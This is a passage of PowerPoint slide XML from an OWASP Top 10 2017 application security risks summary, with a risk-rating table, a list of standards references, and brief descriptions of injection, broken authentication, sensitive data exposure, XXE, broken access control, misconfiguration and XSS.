                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Severe: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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50" b="1" baseline="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Business Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="850" b="1"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46800" marR="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52400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="9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1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Average: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Common</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Average: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Moderate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Difficult: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Uncommon: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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en-US" sz="800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Difficult: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>Minor: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="71" name="Table 70"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1628800781"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="4953000"/>
          <a:ext cx="2236914" cy="4183200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2236914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="335665">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>References</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847535">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1"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OWASP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1"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8"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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indent="-82800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="95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9"/>
                        </a:rPr>
                        <a:t>Article on Threat/Risk Modeling</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="95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57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="57150" indent="-57150">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1"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External</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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rPr>
                        <a:t>ISO 31000: Risk Management </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none"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rPr>
                        <a:t>Std</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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1"/>
                        </a:rPr>
                        <a:t>ISO 27001: ISMS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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2"/>
                        </a:rPr>
                        <a:t>NIST Cyber Framework (US)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"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lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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3"/>
                        </a:rPr>
                        <a:t>ASD Strategic Mitigations (AU)</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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4"/>
                        </a:rPr>
                        <a:t>NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US"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5"/>
                        </a:rPr>
                        <a:t>Microsoft Threat Modelling Tool</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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321167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en-US" dirty="0">
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Risks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t> 2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5308A3-3666-418A-9AE6-240E4688F2BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-685800" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Freeform 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200BBCDD-13C0-4D97-9CEC-01B8726246D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="1071787"/>
            <a:ext cx="5218177" cy="611796"/>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Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Freeform 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77AB65A7-CD59-4B0C-BAB0-A853DD609B84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1014215"/>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A1:2017-Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D11D811-BC41-418D-90D1-CD609B0626DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="1874768"/>
            <a:ext cx="5218177" cy="611796"/>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Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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32" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56513DEF-2444-40AD-AE64-66E7CC6256D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="1817196"/>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A2:2017-Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Freeform 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0014DB-969D-4359-A7D1-99F0AAA09C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="2677749"/>
            <a:ext cx="5218177" cy="666102"/>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Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Freeform 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF109756-C917-4ECB-9826-AC54F0948B32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="2620178"/>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A3:2017- Sensitive Data Exposure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Freeform 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2A0868A-364E-4487-8030-7C4BD69D47DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="3536885"/>
            <a:ext cx="5218177" cy="531518"/>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Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Freeform 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3635AA73-30CD-4FEB-BBAF-A9AD20490C16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="3425038"/>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A4:2017-XML External Entities (XXE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F57B3B-227A-4B44-B219-FB6A81F17116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="4322705"/>
            <a:ext cx="5218177" cy="542148"/>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Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users' accounts, view sensitive files, modify other users’ data, change access rights, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Freeform 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="4228019"/>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A5:2017-Broken Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490400" y="5054225"/>
            <a:ext cx="5218177" cy="682261"/>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Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched and upgraded in a timely fashion.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5031000"/>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endParaRPr lang="en-US" sz="1200" b="1"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1" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="5877145"/>
            <a:ext cx="5218177" cy="661582"/>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XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5833981"/>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A7:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
